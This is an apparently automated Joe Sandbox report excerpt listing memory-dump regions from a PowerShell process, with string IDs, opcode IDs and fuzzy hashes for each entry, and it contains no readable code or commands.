• Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
Similarity
• API ID:
• String ID: Hxq$$tq$$tq
• API String ID: 0-170547144
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$$tq
                                                                                                                                                • API String ID: 0-1597867955
                                                                                                                                                • Opcode ID: fae92476c476be484ddc5d8284cf41e83d11f711828f0d5d50235d929ff3f080
                                                                                                                                                • Instruction ID: 8235eefae7aa4d04b6dc6a397947b5b3e1e6d6b302b68dc9249ca7f19181f2df
                                                                                                                                                • Opcode Fuzzy Hash: fae92476c476be484ddc5d8284cf41e83d11f711828f0d5d50235d929ff3f080
                                                                                                                                                • Instruction Fuzzy Hash: 38A138B070C2499FCB258B79C85066ABBE3AF97220F14C0BAD941CF291DB39DD41D7A1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq
                                                                                                                                                • API String ID: 0-2985750549
                                                                                                                                                • Opcode ID: d9094c0b182cf7f0dc6ac6283669f76b087965b6e4f78dc8fd6fd9d74dd9263b
                                                                                                                                                • Instruction ID: 14b5ec931702e6d947b3fb3c048b48f3f8cfee4cae3e00aa636b8a627f138277
                                                                                                                                                • Opcode Fuzzy Hash: d9094c0b182cf7f0dc6ac6283669f76b087965b6e4f78dc8fd6fd9d74dd9263b
                                                                                                                                                • Instruction Fuzzy Hash: BFB180B4A00209DFDB14DB68C580BAEBBB2BF8A304F25C569D8056F355DB75EC42CB91
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq$$tq
                                                                                                                                                • API String ID: 0-2863945821
                                                                                                                                                • Opcode ID: d4341a737942bf70a7630d483d4fc70919940a627b67dd806c5021e57d065b3d
                                                                                                                                                • Instruction ID: 2f0312baa4d8d8d760ff29804776aaa5110d8bd3f0f2c21b9947ae3feaa5516e
                                                                                                                                                • Opcode Fuzzy Hash: d4341a737942bf70a7630d483d4fc70919940a627b67dd806c5021e57d065b3d
                                                                                                                                                • Instruction Fuzzy Hash: FB412AF6B002199BCB249A69894066EF7A5FFC6214F24813ACC05EB345EB31DAC1D7E1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq$$tq
                                                                                                                                                • API String ID: 0-2863945821
                                                                                                                                                • Opcode ID: 60c725d9adac597f944318dea20e8cb0c1ddd19b9684edbe62e73b0905e6f42c
                                                                                                                                                • Instruction ID: 84707c4c82324770619a9343d3c122e094a7bb44293866b9b019371cca9bfd56
                                                                                                                                                • Opcode Fuzzy Hash: 60c725d9adac597f944318dea20e8cb0c1ddd19b9684edbe62e73b0905e6f42c
                                                                                                                                                • Instruction Fuzzy Hash: EA217DB171424A6BDF34597E9881B37F7969BC2310F34803AD905DB381DD79C9C19360
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$4'tq
                                                                                                                                                • API String ID: 0-2537227400
                                                                                                                                                • Opcode ID: 03048715f4d5f4336c963e3991395a644d802ff5e2383a6bd50f16aa2cdad642
                                                                                                                                                • Instruction ID: 25e2c6664106ddccbc1ce7a513e853be8990fdbdea23f9ba4d14df93c652f7b4
                                                                                                                                                • Opcode Fuzzy Hash: 03048715f4d5f4336c963e3991395a644d802ff5e2383a6bd50f16aa2cdad642
                                                                                                                                                • Instruction Fuzzy Hash: E6223DB4A00215DFD724CB18C990F6ABBB2BB85304F25C1A9D909AF351DB76ED81CF91
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l
                                                                                                                                                • API String ID: 0-621886165
                                                                                                                                                • Opcode ID: 3269cf70127e25561c59040b51b7f8a6f869f33d3ca680fe7f3aca41a3245042
                                                                                                                                                • Instruction ID: 5f11c49cbda061d4c6964213f51b242d04835df92a0b04caac694133b5cb7b5c
                                                                                                                                                • Opcode Fuzzy Hash: 3269cf70127e25561c59040b51b7f8a6f869f33d3ca680fe7f3aca41a3245042
                                                                                                                                                • Instruction Fuzzy Hash: 14A18CF4A00205EFDB14DB69C590BAABBB2AF8A304F14C169E901BF355CB75ED41CB61
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: (f$l$(f$l
                                                                                                                                                • API String ID: 0-621886165
                                                                                                                                                • Opcode ID: ddb23e80c583d5a7a5bbe19698942e69fdf2bbc9c3ebb73a4747f9e46e98bf3c
                                                                                                                                                • Instruction ID: 3557a1b5340db8e17d27fa88125ed6660b635b05c906b5b5d3d6d66b6d4358cc
                                                                                                                                                • Opcode Fuzzy Hash: ddb23e80c583d5a7a5bbe19698942e69fdf2bbc9c3ebb73a4747f9e46e98bf3c
                                                                                                                                                • Instruction Fuzzy Hash: B0618FB0A08205DFDB15CF58C494AAAFBF2FF4A320F19C1AAD814AB355C735E941DB91
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq
                                                                                                                                                • API String ID: 0-1837209516
                                                                                                                                                • Opcode ID: ad6a5e529de87e79d2bfb9d5185929604bb6584f4cc0517946637e609f3c13ea
                                                                                                                                                • Instruction ID: 324a984abfe5c3da11b514c8f50aca860eeec65b9a1be8cb2e52fd585a658fd3
                                                                                                                                                • Opcode Fuzzy Hash: ad6a5e529de87e79d2bfb9d5185929604bb6584f4cc0517946637e609f3c13ea
                                                                                                                                                • Instruction Fuzzy Hash: 97212BB1608385ABDB314A6A4881763BFA55F83350F28407AD9409B386EA7CDAD0D771
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $tq$$tq
                                                                                                                                                • API String ID: 0-1837209516
                                                                                                                                                • Opcode ID: 528ef21e11f4f5c7b9b74873cb234212cd92587e91c171a699c5034834a08c8f
                                                                                                                                                • Instruction ID: 86337d315347c7c47e3611b6cf3a1289f7a0995aec421ddbcca1a3e34c26c648
                                                                                                                                                • Opcode Fuzzy Hash: 528ef21e11f4f5c7b9b74873cb234212cd92587e91c171a699c5034834a08c8f
                                                                                                                                                • Instruction Fuzzy Hash: 1921C8F6908616DFCB10DF6995803A9FBB4BF56210F198176CC09A7245D33199C0DBA4
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: W
                                                                                                                                                • API String ID: 0-655174618
                                                                                                                                                • Opcode ID: 982f320597d2e89493e837ce0884730af3aff1a35ae24d9025ee7e5e44162e4e
                                                                                                                                                • Instruction ID: 4b38dd7dfd6518e01eda7792a76e67fc48d21dee0192b9a78779b618458ba059
                                                                                                                                                • Opcode Fuzzy Hash: 982f320597d2e89493e837ce0884730af3aff1a35ae24d9025ee7e5e44162e4e
                                                                                                                                                • Instruction Fuzzy Hash: DD719A34A15204DFCB15EFA8C4849AEBBF2FF89304F1894A9E445AF261DB35ED85CB10
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq
                                                                                                                                                • API String ID: 0-257826263
                                                                                                                                                • Opcode ID: dea98f0f1358be778006eec60997959be69d0c7486a2919a9380260c12b82e3d
                                                                                                                                                • Instruction ID: e7677fbeb9f65daf357731b5001b00f3f5f5f00c290d87d7b67f797edee2271c
                                                                                                                                                • Opcode Fuzzy Hash: dea98f0f1358be778006eec60997959be69d0c7486a2919a9380260c12b82e3d
                                                                                                                                                • Instruction Fuzzy Hash: 0C41B5F4B0C2029FCB24CF65C580B6AB7E3AF67664F2480B5D9009B255D739DA41D791
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: cfbe5afa9d6979e94818d9dd7301e3a76ab3665c6f1706df2cb716cf5c03a0b4
                                                                                                                                                • Instruction ID: 9b61f52c596fb124aef858f5b188985f77caf9b20209f09403dff07fba05b0d5
                                                                                                                                                • Opcode Fuzzy Hash: cfbe5afa9d6979e94818d9dd7301e3a76ab3665c6f1706df2cb716cf5c03a0b4
                                                                                                                                                • Instruction Fuzzy Hash: 5A223874A002499FCB05CFA8C494AAEFBB2FF88314F248559E815AB365D731FD55CBA0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8236a40468c4a291c12659d895db709be5b09408f3a210864e3b33981c81c377
                                                                                                                                                • Instruction ID: 5e24b98d24ba07ddcaff187185be812a5cd42338b52f964e2d422fa1455d0002
                                                                                                                                                • Opcode Fuzzy Hash: 8236a40468c4a291c12659d895db709be5b09408f3a210864e3b33981c81c377
                                                                                                                                                • Instruction Fuzzy Hash: F2D12B74A002189FDB05CFA8D484A9DFBB2FF88314F249559E809AB391D771FD92CB90
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 76b413776afeb67cf4d0243ce0bc8e9d371c10b816996671de0e629b5a19bf0f
                                                                                                                                                • Instruction ID: 28b212b0c8add4f40bd0159516548db7e48a10ba497631860da1f9590a34c13a
                                                                                                                                                • Opcode Fuzzy Hash: 76b413776afeb67cf4d0243ce0bc8e9d371c10b816996671de0e629b5a19bf0f
                                                                                                                                                • Instruction Fuzzy Hash: 37D1F274A00218AFDB15DFA8D484A9DFBB2FF88314F248159E849AB355D731FD92CB90
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1bb6b4d9bd5b314c888df5bfb7a43fcebc80b20cc2c5591e95efdb008e94a581
                                                                                                                                                • Instruction ID: db874903acd076551fd8396f7efa97954dbab4f1e78897b64edd388240e6d2fe
                                                                                                                                                • Opcode Fuzzy Hash: 1bb6b4d9bd5b314c888df5bfb7a43fcebc80b20cc2c5591e95efdb008e94a581
                                                                                                                                                • Instruction Fuzzy Hash: 99C18C71A002089FDB14DFA8D584A9DBBF2FF84314F158959E406AF266DB34FC59CB90
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2c03730202281f03c1326fbe96dd939db5c805d9b26d1ba8d211d658aad1ab15
                                                                                                                                                • Instruction ID: e15455a5aeb857ae09d67bdfec768c665e79a840765d8c6dd42ec6a6d1d92e3c
                                                                                                                                                • Opcode Fuzzy Hash: 2c03730202281f03c1326fbe96dd939db5c805d9b26d1ba8d211d658aad1ab15
                                                                                                                                                • Instruction Fuzzy Hash: A1B14F70E002099FDF14CFA8D8857DEBBF1EF88318F149529E815AB254EB75B855CB81
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 136162657576538032ea9dec27c53077d066b2e4c31de866997966ca6f641670
                                                                                                                                                • Instruction ID: 4640ac4e85eb2a98ac8d201b7339ec68926f38288118852d42c20f5a6725024f
                                                                                                                                                • Opcode Fuzzy Hash: 136162657576538032ea9dec27c53077d066b2e4c31de866997966ca6f641670
                                                                                                                                                • Instruction Fuzzy Hash: 73A15C70E10209DFDB14CFA8D8857DDBBF2AF48318F149529E815EB294EB74B895CB81
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b96a3a4ad94bf6e13bd0b0c4a1790faba9de270ab30ae9cc3ca5936e94a116ad
                                                                                                                                                • Instruction ID: 05838531f46369c832ad4ec2c29302f9f18accfe3bc72ab5a0c7a8722145c074
                                                                                                                                                • Opcode Fuzzy Hash: b96a3a4ad94bf6e13bd0b0c4a1790faba9de270ab30ae9cc3ca5936e94a116ad
                                                                                                                                                • Instruction Fuzzy Hash: 22719DB0E00209CFDF14CFA8D8857DEBBF2AF88318F149529D415AB264EB74A851CF95
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: a3151ce87ee79d47af45b6e75c7abefa448e0289813ccaf009db4b301938b158
                                                                                                                                                • Instruction ID: 32308253d3bcaa839be492b2fca0077b6595ffc27e203a2be835c0d370955193
                                                                                                                                                • Opcode Fuzzy Hash: a3151ce87ee79d47af45b6e75c7abefa448e0289813ccaf009db4b301938b158
                                                                                                                                                • Instruction Fuzzy Hash: E7714AB0A00219DFDF14DFA5D490AADBBF2FF88304F148869E415AB291DB35AD46CB80
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c29ec230cdde248b256c129aa909b7b3589799ac6ecc4a0a59efa01ff8635a0d
                                                                                                                                                • Instruction ID: 5e0e1ac0139863efe65cfb0acdfbee73657d27a80ee3871b042bb9817736830c
                                                                                                                                                • Opcode Fuzzy Hash: c29ec230cdde248b256c129aa909b7b3589799ac6ecc4a0a59efa01ff8635a0d
                                                                                                                                                • Instruction Fuzzy Hash: FB716C70A00209CFCB14DF69C884A9EBBF6FF84314F14896AE459AB651DB75BC46CB80
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: efddf8179458d4db505f4bf10e15066f9569d61c66363cb34c6c1fce0c599907
                                                                                                                                                • Instruction ID: b74e5b1692b5d101870ebdcd88de2c03cedd3e3bd9ffc6aef66b9541cdebd853
                                                                                                                                                • Opcode Fuzzy Hash: efddf8179458d4db505f4bf10e15066f9569d61c66363cb34c6c1fce0c599907
                                                                                                                                                • Instruction Fuzzy Hash: BC714CB0E00209DFDF14CFA9C8857DEBBF2AF88318F149529E415AB254EB74A851CF95
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 8f51622c280e0d98a7e2b37f4006e06f2fea696d541169bdab9cddc82fd0d01a
                                                                                                                                                • Instruction ID: 53527756fafce16ac22308d5a7598a6602e5bef1c7961108244123ba5a1d1aa8
                                                                                                                                                • Opcode Fuzzy Hash: 8f51622c280e0d98a7e2b37f4006e06f2fea696d541169bdab9cddc82fd0d01a
                                                                                                                                                • Instruction Fuzzy Hash: F041E6F1A022069FCB258F25C581A7EBBB2AF87354F15C0B9D8049F252D735DA81DBE1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 7c5fb78628bcec9ea155365bd60c8953e66192c9f538ffb7d6daaf603297720a
                                                                                                                                                • Instruction ID: dd2a2c5308d50c7a1099358532b27cdba40de7f77597565d2e0b0e4a469898cb
                                                                                                                                                • Opcode Fuzzy Hash: 7c5fb78628bcec9ea155365bd60c8953e66192c9f538ffb7d6daaf603297720a
                                                                                                                                                • Instruction Fuzzy Hash: 77416D70B00200DFD715DB24C9A8AAABBF6EF89744F055868E406EB7A1DB34AC41CB90
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bd25fc44e7610a5724ddfe535271243cfe41b7bf8cc9651448b122424b437f4b
                                                                                                                                                • Instruction ID: 006ca39f68d525284cfc82bf428cc7835ab013bf0827da664e73af146d833ad3
                                                                                                                                                • Opcode Fuzzy Hash: bd25fc44e7610a5724ddfe535271243cfe41b7bf8cc9651448b122424b437f4b
                                                                                                                                                • Instruction Fuzzy Hash: B7415D70A00215DFDB14DFA9C89469DBBF2FF88304F158829D405AB391DB75BC45CB90
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1967106381.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_4ea0000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b98be58713bc3265ac681be786af9e2f6694ecc2a832eab75ec49a0b8debb982
                                                                                                                                                • Instruction ID: a56a009aabf0b40f32b239e8115d071bcf511c21ea65a20f3cf06a47d8bc576b
                                                                                                                                                • Opcode Fuzzy Hash: b98be58713bc3265ac681be786af9e2f6694ecc2a832eab75ec49a0b8debb982
                                                                                                                                                • Instruction Fuzzy Hash: 68414974A005059FCB06CF58C4D89AEFBB1FF48314B2586A9D815AB364C732FC65CBA0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$84"l$d%zq$d%zq$d%zq$tPtq$$tq
                                                                                                                                                • API String ID: 0-2893587698
                                                                                                                                                • Opcode ID: b0c0871057bd14c70bee53c2a9b8b03c9ef08d97d9991c06d4e63915bcd18905
                                                                                                                                                • Instruction ID: db2fd78db423751fb277864c58078a26aa65ffff93a0271d7d0320581cc5d0d7
                                                                                                                                                • Opcode Fuzzy Hash: b0c0871057bd14c70bee53c2a9b8b03c9ef08d97d9991c06d4e63915bcd18905
                                                                                                                                                • Instruction Fuzzy Hash: 2151D7F5B04205EFCB248F29C491B6ABBB1AF46350F2980B5E802AF291D735DD41DB61
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$84"l$tPtq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-1773754857
                                                                                                                                                • Opcode ID: 85299e295a907d26a7ba8c05bcbfe23cf5fac49b3e872d6c371e48896c074f90
                                                                                                                                                • Instruction ID: 252a669fe8b8df170745f5ac2b1a67e1ba00c65fb012dd01e5fab231290e8d2b
                                                                                                                                                • Opcode Fuzzy Hash: 85299e295a907d26a7ba8c05bcbfe23cf5fac49b3e872d6c371e48896c074f90
                                                                                                                                                • Instruction Fuzzy Hash: 5861C3F0704206DFDB28CE15C580BAAB7B2AF47352F158075EC069B295C735DE90EBA1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$84"l$d%zq$d%zq$d%zq$tPtq
                                                                                                                                                • API String ID: 0-3727785734
                                                                                                                                                • Opcode ID: 409396c58a52311e29ad6c5e116077c9ad018d7b5db3c143fd8200b305e096a5
                                                                                                                                                • Instruction ID: 1cd2302cf5a624a3c7eee8f7af45fd55822cc1f20dd999c5f480d727739efeea
                                                                                                                                                • Opcode Fuzzy Hash: 409396c58a52311e29ad6c5e116077c9ad018d7b5db3c143fd8200b305e096a5
                                                                                                                                                • Instruction Fuzzy Hash: 8031C4F4B00205DFCB24CF6DC480A5AFBA2BB89710F2581A5E956AF350C732DD42CB61
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$4'tq$4'tq$$tq$$tq
                                                                                                                                                • API String ID: 0-2864496143
                                                                                                                                                • Opcode ID: 90d1dc358a0a58f9b9be30bec3765ca691388037b755b73f9a7fa734ed308702
                                                                                                                                                • Instruction ID: ebd279c9c006e6a460a3064179afd4bb81a78b7505a57b038a2fcdb31f878100
                                                                                                                                                • Opcode Fuzzy Hash: 90d1dc358a0a58f9b9be30bec3765ca691388037b755b73f9a7fa734ed308702
                                                                                                                                                • Instruction Fuzzy Hash: CA313BF1A0C34E9FCB2606A55854375BBA16F83210F2D81B7DB418B181DB3DC955E362
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1997295541.0000000007C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_7c10000_powershell.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 4'tq$$tq$$tq$$tq$$tq
                                                                                                                                                • API String ID: 0-2113016647
                                                                                                                                                • Opcode ID: 081ee95db2cd36c44c5545ed30cf1989223f24597475a626229a262435543be8
                                                                                                                                                • Instruction ID: 42fed2827a974d34bc0d94d78ce252d784b6e9db5509b1b4bdead653e8cc2a68
                                                                                                                                                • Opcode Fuzzy Hash: 081ee95db2cd36c44c5545ed30cf1989223f24597475a626229a262435543be8
